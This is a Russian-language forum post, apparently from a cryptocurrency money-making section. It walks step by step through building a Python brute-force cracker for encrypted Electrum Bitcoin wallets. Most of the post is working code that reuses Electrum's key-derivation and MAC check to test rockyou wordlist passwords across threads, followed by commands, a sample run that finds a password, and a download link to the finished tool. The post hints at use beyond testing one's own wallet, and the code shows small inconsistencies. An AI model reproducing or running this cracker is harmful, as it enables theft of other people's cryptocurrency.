|
Прочие способы заработка криптовалюты Как заработать криптовалюту без вложений. Как получить криптовалюту бесплатно. |
Опции темы |
29.11.2021, 00:58 | #1 |
Member
Регистрация: 08.01.2021
Сообщений: 52
|
Вскрываем encrypted Electrum Wallets методом грубой силы
Вскрываем encrypted Electrum Wallets методом грубой силы
BruteForce encrypted Electum Wallets. Python coding. Have Fun! Доброго времени суток, дорогие форумчане! Я не силен в написании статей и никогда не работал журналистом, поэтому, предположительно, статья не будет произведением литературного искусства, но мне это и не нужно, моя цель - донести до вас техническую часть как можно прозрачнее. Мы проведем небольшое исследование Electrum Bitcoin Wallet (далее EBW), а именно:
PS: Я буду использовать OS Ubuntu 18.04, Python 3.6.9, Sublime Text 3 для разработки нашего брутфорсера. 1. Создание проекта Для начала скачаем Electrum-4.x.x.tar.gz (https://electrum.org/panel-download.html) python source и распакуем (я буду использовать версию 4.1.2): Код:
cd ~/Downloads && tar -xf Electrum-4.1.2.tar.gz && cd Electrum-4.x.x && ls -w1 Код:
AUTHORS contrib electrum electrum.desktop Electrum.egg-info LICENCE MANIFEST.in packages PKG-INFO README.rst RELEASE-NOTES run_electrum setup.cfg setup.py Давайте создадим рабочую директорию: Код:
mkdir ~/EBW_bf mkdir ~/EBW_bf/src cp -r ~/Downloads/Electrum-4.1.2/electrum ~/EBW_bf/ cd ~/EBW_bf Код:
python3 -m venv ./venv && source ./venv/bin/activate Все подготовлено, можно приступать к написанию кода, а вернее к копипасту из исходников Electrum. Для начала ознакомимся с самим процессом расшифровки кошелка, я обозначу ее в виде схемы: 2. Кодинг Начнем с main.py Здесь нам понадобится класс WalletStorage, который и будет содержать методы расшифровки нашего кошелька. Я буду игнорировать ненужные нам методы, т.к. мы сосредоточимся только на проверке пароля. Чтобы понять, как организована инициализация кошелька в Electrum обратимся к electrum/storage.py, а конкретно, к классу WalletStorage. При проверке пароля (ключа) Electrum инициализирует класс WalletStorage и вызывает из него метод check_password(), который вызывает метот decrypt(). Так.. не очень понятно, как мне кажется. Давайте запишем эту конструкцию псевдокодом для большей ясности: Код:
init class WalletStorage('path_to_walet') --> check_password(password) --> decrypt(password) В итоге я пришел к такому началу: Код:
import hashlib import sys import os from src import ecc class WalletStorage(object): def __init__(self, path): self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path) self._file_exists = bool(self.path and os.path.exists(self.path)) self.pubkey = None self.decrypted = '' with open(self.path, "r", encoding='utf-8') as f: self.raw = f.read() def _get_encryption_magic(self): return b'BIE1' def decrypt(self, password) -> None: ec_key = self.get_eckey_from_password(password) s = False if self.raw: enc_magic = self._get_encryption_magic() s = ec_key.decrypt_message(self.raw, enc_magic) if s: print('[+] %s' % password) def check_password(self, password) -> None: self.decrypt(password) @staticmethod def get_eckey_from_password(password): secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024) ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret) return ec_key def main(): # get wallet name for args wallet_name = None if len(sys.argv) != 2: print('Usage: %s <wallet_name>' % sys.argv[0]) exit() else: wallet_name = sys.argv[1] if not os.path.exists(wallet_name): print('Wallet not found in current directory.') exit() # init wallet wallet = WalletStorage(wallet_name) for password in ['test1', 'passwordTest2']: wallet.check_password(password) if __name__ == "__main__": main = main() 1) get_eckey_from_password - получение EC_KEY из секрета. Метод возвращает объект класса ECPrivkey к которому мы обратимся позже. 2) get_encryption_magic - получение способа шифрования (пароль, ключ и пр). Можете заметить, что я сократил этот метод до return b'BIE1', т.к буду рассматривать только способ шифрования по паролю. BIE1 - первые 4 символа кошелька, отвечающие за способ шифрования (сделайте base64 decode если не доверяете) Следующим шагом рассмотрим методы класса ECPrivkey, а конкретно, метода decrypt_message, который и даст нам желаемое ДА или НЕТ при проверке пароля. Начнем по-порядку: первым у нас вызывается метод decrypt(password)--> get_eckey_from_password(password) который обращается к методу ecc.ECPrivkey.from_arbitrary_size_secret(secret) Давайте создадим файл ecc.py в рабочей директории src, который и будет содержать класс ECPrivkey: PS: я соблюдаю аналогичные обазначения имен файлов с проектом electrum, что бы не возникло путаницы. должно получится так: Код:
electrum venv main.py src ├── ecc.py └── __init__.py __init__.py Код:
from . import ecc Первым делом, у нас вызвается статичный метод класса: ECPrivkey.from_arbitrary_size_secret(secret), давайте посмотрим что там происходит: обратимся к electrum/ecc.py Опять все запутанно... давайте запишем в читабельном виде: Код:
from_arbitrary_size_secret() --> init class ECPrivkey(какой-то скаляр) --> init class ECPubkey(что-то нечеловеческое). Давайте все оформим: ecc.py Код:
from typing import Union, Tuple, Optional from ctypes import ( byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer, CFUNCTYPE, POINTER, cast ) import base64 import hashlib from src.util import assert_bytes from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED from src.crypto import hmac_oneshot def string_to_number(b: bytes) -> int: return int.from_bytes(b, byteorder='big', signed=False) def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool: if isinstance(secret, bytes): secret = string_to_number(secret) return 0 < secret < CURVE_ORDER def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]: assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}' pubkey_ptr = create_string_buffer(64) ret = _libsecp256k1.secp256k1_ec_pubkey_parse( _libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey)) if not ret: raise InvalidECPointException('public key could not be parsed or is invalid') pubkey_serialized = create_string_buffer(65) pubkey_size = c_size_t(65) _libsecp256k1.secp256k1_ec_pubkey_serialize( _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED) pubkey_serialized = bytes(pubkey_serialized) assert pubkey_serialized[0] == 0x04, pubkey_serialized x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False) y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False) return x, y class ECPubkey(object): def __init__(self, b: Optional[bytes]): if b is not None: assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}' if isinstance(b, bytearray): b = bytes(b) self._x, self._y = _x_and_y_from_pubkey_bytes(b) else: self._x, self._y = None, None def is_at_infinity(self): return self == POINT_AT_INFINITY def x(self) -> int: return self._x def y(self) -> int: return self._y def get_public_key_bytes(self, compressed=True): if self.is_at_infinity(): raise Exception('point is at infinity') x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False) y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False) if compressed: header = b'\x03' if self.y() & 1 else b'\x02' return header + x else: header = b'\x04' return header + x + y def _to_libsecp256k1_pubkey_ptr(self): pubkey = create_string_buffer(64) public_pair_bytes = self.get_public_key_bytes(compressed=False) ret = _libsecp256k1.secp256k1_ec_pubkey_parse( _libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes)) if not ret: raise Exception('public key could not be parsed or is invalid') return pubkey @classmethod def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey': pubkey_serialized = create_string_buffer(65) pubkey_size = c_size_t(65) _libsecp256k1.secp256k1_ec_pubkey_serialize( _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED) return ECPubkey(bytes(pubkey_serialized)) def __mul__(self, other: int): if not isinstance(other, int): raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other))) other %= CURVE_ORDER if self.is_at_infinity() or other == 0: return POINT_AT_INFINITY pubkey = self._to_libsecp256k1_pubkey_ptr() ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big")) if not ret: return POINT_AT_INFINITY return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey) CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141 GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798' '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8')) POINT_AT_INFINITY = ECPubkey(None) class ECPrivkey(ECPubkey): def __init__(self, privkey_bytes: bytes): assert_bytes(privkey_bytes) if len(privkey_bytes) != 32: raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes))) secret = string_to_number(privkey_bytes) if not is_secret_within_curve_range(secret): raise InvalidECPointException('Invalid secret scalar (not within curve order)') self.secret_scalar = secret pubkey = GENERATOR * secret super().__init__(pubkey.get_public_key_bytes(compressed=False)) @classmethod def from_arbitrary_size_secret(cls, privkey_bytes: bytes): return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes)) @classmethod def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes: scalar = string_to_number(privkey_bytes) % CURVE_ORDER if scalar == 0: raise Exception('invalid EC private key scalar: zero') privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False) return privkey_32bytes def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes: encrypted = base64.b64decode(encrypted) if len(encrypted) < 85: return False magic_found = encrypted[:4] ephemeral_pubkey_bytes = encrypted[4:37] ciphertext = encrypted[37:-32] mac = encrypted[-32:] if magic_found != magic: return False try: ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes) except InvalidECPointException as e: return False ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True) key = hashlib.sha512(ecdh_key).digest() iv, key_e, key_m = key[0:16], key[16:32], key[32:] if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256): return False else: return True
создаем в директории src: util.py, ecc_fast.py, crypto.py соответственно. И теперь наш __init__.py примет следующий вид: __init__.py Код:
from . import ecc from . import util from . import ecc_fast from . import crypto ecc_fast.py Код:
import os import sys import ctypes from ctypes import ( byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer, CFUNCTYPE, POINTER, cast ) SECP256K1_FLAGS_TYPE_MASK = ((1 << 8) - 1) SECP256K1_FLAGS_TYPE_CONTEXT = (1 << 0) SECP256K1_FLAGS_TYPE_COMPRESSION = (1 << 1) # /** The higher bits contain the actual data. Do not use directly. */ SECP256K1_FLAGS_BIT_CONTEXT_VERIFY = (1 << 8) SECP256K1_FLAGS_BIT_CONTEXT_SIGN = (1 << 9) SECP256K1_FLAGS_BIT_COMPRESSION = (1 << 8) # /** Flags to pass to secp256k1_context_create. */ SECP256K1_CONTEXT_VERIFY = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_VERIFY) SECP256K1_CONTEXT_SIGN = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_SIGN) SECP256K1_CONTEXT_NONE = (SECP256K1_FLAGS_TYPE_CONTEXT) SECP256K1_EC_COMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION | SECP256K1_FLAGS_BIT_COMPRESSION) SECP256K1_EC_UNCOMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION) class LibModuleMissing(Exception): pass def load_library() library_paths = ['/usr/lib/libsecp256k1.so.0'] exceptions = [] secp256k1 = None for libpath in library_paths: try: secp256k1 = ctypes.cdll.LoadLibrary(libpath) except BaseException as e: exceptions.append(e) else: break if not secp256k1: print(f'libsecp256k1 library failed to load. exceptions: {repr(exceptions)}') return None try: secp256k1.secp256k1_context_create.argtypes = [c_uint] secp256k1.secp256k1_context_create.restype = c_void_p secp256k1.secp256k1_context_randomize.argtypes = [c_void_p, c_char_p] secp256k1.secp256k1_context_randomize.restype = c_int secp256k1.secp256k1_ec_pubkey_create.argtypes = [c_void_p, c_void_p, c_char_p] secp256k1.secp256k1_ec_pubkey_create.restype = c_int secp256k1.secp256k1_ecdsa_sign.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p, c_void_p, c_void_p] secp256k1.secp256k1_ecdsa_sign.restype = c_int secp256k1.secp256k1_ecdsa_verify.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p] secp256k1.secp256k1_ecdsa_verify.restype = c_int secp256k1.secp256k1_ec_pubkey_parse.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t] secp256k1.secp256k1_ec_pubkey_parse.restype = c_int secp256k1.secp256k1_ec_pubkey_serialize.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p, c_uint] secp256k1.secp256k1_ec_pubkey_serialize.restype = c_int secp256k1.secp256k1_ecdsa_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p] secp256k1.secp256k1_ecdsa_signature_parse_compact.restype = c_int secp256k1.secp256k1_ecdsa_signature_normalize.argtypes = [c_void_p, c_char_p, c_char_p] secp256k1.secp256k1_ecdsa_signature_normalize.restype = c_int secp256k1.secp256k1_ecdsa_signature_serialize_compact.argtypes = [c_void_p, c_char_p, c_char_p] secp256k1.secp256k1_ecdsa_signature_serialize_compact.restype = c_int secp256k1.secp256k1_ecdsa_signature_parse_der.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t] secp256k1.secp256k1_ecdsa_signature_parse_der.restype = c_int secp256k1.secp256k1_ecdsa_signature_serialize_der.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p] secp256k1.secp256k1_ecdsa_signature_serialize_der.restype = c_int secp256k1.secp256k1_ec_pubkey_tweak_mul.argtypes = [c_void_p, c_char_p, c_char_p] secp256k1.secp256k1_ec_pubkey_tweak_mul.restype = c_int secp256k1.secp256k1_ec_pubkey_combine.argtypes = [c_void_p, c_char_p, c_void_p, c_size_t] secp256k1.secp256k1_ec_pubkey_combine.restype = c_int # --enable-module-recovery try: secp256k1.secp256k1_ecdsa_recover.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p] secp256k1.secp256k1_ecdsa_recover.restype = c_int secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p, c_int] secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.restype = c_int except (OSError, AttributeError): raise LibModuleMissing('libsecp256k1 library found but it was built ' 'without required module (--enable-module-recovery)') secp256k1.ctx = secp256k1.secp256k1_context_create(SECP256K1_CONTEXT_SIGN | SECP256K1_CONTEXT_VERIFY) ret = secp256k1.secp256k1_context_randomize(secp256k1.ctx, os.urandom(32)) if not ret: print('secp256k1_context_randomize failed') return None return secp256k1 except (OSError, AttributeError) as e: print(f'libsecp256k1 library was found and loaded but there was an error when using it: {repr(e)}') return None _libsecp256k1 = None try: _libsecp256k1 = load_library() except BaseException as e: print(f'failed to load libsecp256k1: {repr(e)}') if _libsecp256k1 is None: # hard fail: sys.exit(f"Error: Failed to load libsecp256k1.") Стоит отметить, т.к. я пишу брут под Ubuntu то для обнаружения libsecp256k1 я оставил единственный путь: Код:
library_paths = ['/usr/lib/x86_64-linux-gnu/libsecp256k1.so.0'] Код:
find /usr/ -iname "libsecp256k1.so.0" Код:
def assert_bytes(*args): """ porting helper, assert args type """ try: for x in args: assert isinstance(x, (bytes, bytearray)) except: print('assert bytes failed', list(map(type, args))) raise Код:
import hmac from src.util import assert_bytes def hmac_oneshot(key: bytes, msg: bytes, digest) -> bytes: if hasattr(hmac, 'digest'): # requires python 3.7+; faster return hmac.digest(key, msg, digest) else: return hmac.new(key, msg, digest).digest() Продублирую дабы Вам не скролить: ecc.py Код:
from typing import Union, Tuple, Optional from ctypes import ( byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer, CFUNCTYPE, POINTER, cast ) import base64 import hashlib from src.util import assert_bytes from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED from src.crypto import hmac_oneshot def string_to_number(b: bytes) -> int: return int.from_bytes(b, byteorder='big', signed=False) def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool: if isinstance(secret, bytes): secret = string_to_number(secret) return 0 < secret < CURVE_ORDER def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]: assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}' pubkey_ptr = create_string_buffer(64) ret = _libsecp256k1.secp256k1_ec_pubkey_parse( _libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey)) if not ret: raise InvalidECPointException('public key could not be parsed or is invalid') pubkey_serialized = create_string_buffer(65) pubkey_size = c_size_t(65) _libsecp256k1.secp256k1_ec_pubkey_serialize( _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED) pubkey_serialized = bytes(pubkey_serialized) assert pubkey_serialized[0] == 0x04, pubkey_serialized x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False) y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False) return x, y class ECPubkey(object): def __init__(self, b: Optional[bytes]): if b is not None: assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}' if isinstance(b, bytearray): b = bytes(b) self._x, self._y = _x_and_y_from_pubkey_bytes(b) else: self._x, self._y = None, None def is_at_infinity(self): return self == POINT_AT_INFINITY def x(self) -> int: return self._x def y(self) -> int: return self._y def get_public_key_bytes(self, compressed=True): if self.is_at_infinity(): raise Exception('point is at infinity') x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False) y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False) if compressed: header = b'\x03' if self.y() & 1 else b'\x02' return header + x else: header = b'\x04' return header + x + y def _to_libsecp256k1_pubkey_ptr(self): pubkey = create_string_buffer(64) public_pair_bytes = self.get_public_key_bytes(compressed=False) ret = _libsecp256k1.secp256k1_ec_pubkey_parse( _libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes)) if not ret: raise Exception('public key could not be parsed or is invalid') return pubkey @classmethod def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey': pubkey_serialized = create_string_buffer(65) pubkey_size = c_size_t(65) _libsecp256k1.secp256k1_ec_pubkey_serialize( _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED) return ECPubkey(bytes(pubkey_serialized)) def __mul__(self, other: int): if not isinstance(other, int): raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other))) other %= CURVE_ORDER if self.is_at_infinity() or other == 0: return POINT_AT_INFINITY pubkey = self._to_libsecp256k1_pubkey_ptr() ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big")) if not ret: return POINT_AT_INFINITY return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey) CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141 GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798' '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8')) POINT_AT_INFINITY = ECPubkey(None) class ECPrivkey(ECPubkey): def __init__(self, privkey_bytes: bytes): assert_bytes(privkey_bytes) if len(privkey_bytes) != 32: raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes))) secret = string_to_number(privkey_bytes) if not is_secret_within_curve_range(secret): raise InvalidECPointException('Invalid secret scalar (not within curve order)') self.secret_scalar = secret pubkey = GENERATOR * secret super().__init__(pubkey.get_public_key_bytes(compressed=False)) @classmethod def from_arbitrary_size_secret(cls, privkey_bytes: bytes): return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes)) @classmethod def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes: scalar = string_to_number(privkey_bytes) % CURVE_ORDER if scalar == 0: raise Exception('invalid EC private key scalar: zero') privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False) return privkey_32bytes def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes: encrypted = base64.b64decode(encrypted) if len(encrypted) < 85: return False magic_found = encrypted[:4] ephemeral_pubkey_bytes = encrypted[4:37] ciphertext = encrypted[37:-32] mac = encrypted[-32:] if magic_found != magic: return False try: ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes) except: return False ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True) key = hashlib.sha512(ecdh_key).digest() iv, key_e, key_m = key[0:16], key[16:32], key[32:] if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256): return False else: return True Код:
pubkey = GENERATOR * secret Теперь разберем долгожданнй метод decrypt_message(), который вызывается в main.py и должен вернуть нам результат. На этом этапе стоит отметить, что у нас уже инициализованы классы ECPubkey и ECPrivkey ранее (держите это в голове) Код:
def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes: encrypted = base64.b64decode(encrypted) if len(encrypted) < 85: return False magic_found = encrypted[:4] ephemeral_pubkey_bytes = encrypted[4:37] ciphertext = encrypted[37:-32] mac = encrypted[-32:] if magic_found != magic: return False try: ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes) except: return False ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True) key = hashlib.sha512(ecdh_key).digest() iv, key_e, key_m = key[0:16], key[16:32], key[32:] # здесь мы оставим только return False если пароль не соответствует искомому и return False в противном случае. if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256): return False else: return True Для достижения многопоточности будем использовать ThreadExecutorPool (кому как, а я просто привык с ней работать). Чтобы не перегружать и без того занятую память, будем читать файл с паролями построчно, а не грузить все их в память. Вот что я предлагаю: Код:
que = [] with open(file_with_password, 'r', errors='replace') as fd: for password in fd: password = password.rstrip() que.append(password) if len(que) == 1000: with ThreadPoolExecutor(max_workers=4) as pool: pool.map(worker, que) que = [] if len(que) > 0: with ThreadPoolExecutor(max_workers=4) as pool: pool.map(worker, que) Код:
python3 -m pip install tqdm В итоге у нас получится что-то то такое: main.py Код:
from concurrent.futures import ThreadPoolExecutor from tqdm import tqdm import hashlib import sys import os from src import ecc class WalletStorage(object): def __init__(self, path): self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path) self._file_exists = bool(self.path and os.path.exists(self.path)) self.pubkey = None self.decrypted = '' with open(self.path, "r", encoding='utf-8') as f: self.raw = f.read() def _get_encryption_magic(self): return b'BIE1' def decrypt(self, password) -> None: ec_key = self.get_eckey_from_password(password) s = False if self.raw: enc_magic = self._get_encryption_magic() s = ec_key.decrypt_message(self.raw, enc_magic) if s: print() print('[+] %s' % password) exit() def check_password(self, password) -> None: global PBAR self.decrypt(password) PBAR.update(1) @staticmethod def get_eckey_from_password(password): secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024) ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret) return ec_key def main(): global PBAR # get wallet name for args wallet_name = None if len(sys.argv) != 2: print('Usage: %s <wallet_name>' % sys.argv[0]) exit() else: wallet_name = sys.argv[1] if not os.path.exists(wallet_name): print('Wallet not found in current directory.') exit() # init wallet wallet = WalletStorage(wallet_name) print('loading dict ...') dict_len = 0 with open('rockyou.txt', 'r', errors='replace') as fd: for line in fd: dict_len += 1 print('starting...') print() PBAR = tqdm(total=dict_len) que = [] with open('rockyou.txt', 'r', errors='replace') as fd: for password in fd: password = password.rstrip() que.append(password) if len(que) == 1000: with ThreadPoolExecutor(max_workers=4) as pool: pool.map(wallet.check_password, que) que = [] if len(que) > 0: with ThreadPoolExecutor(max_workers=4) as pool: pool.map(wallet.check_password, que) if __name__ == "__main__": main = main() Код:
venv electrum rockyou.txt main.py src ├── crypto.py ├── ecc_fast.py ├── ecc.py ├── __init__.py └── util.py В качестве словаря будем использовать всем известный rockyou. Создадим кошелек с простеньким паролем (у меня это password123), скопируем его в рабочую директорию и начнем тестировать. PS: поставьте для тестирования пароль который есть в словаре. Наша задача убедится в корректности работы скрипта, а потом уже делайте все что душе угодно. Код:
cp ~/.electrum/wallets/test_wallet ~/EBW_bf python3 main.py test_wallet Код:
loading dict ... starting... 38%|█████████ | 5491654/14344324 [6489.81it/s] [+] testpassword123 Ссылка на реализацию: https://mega.nz/file/CkMHGSpD#rtkiwc...PZsUdlM3ynh1uY |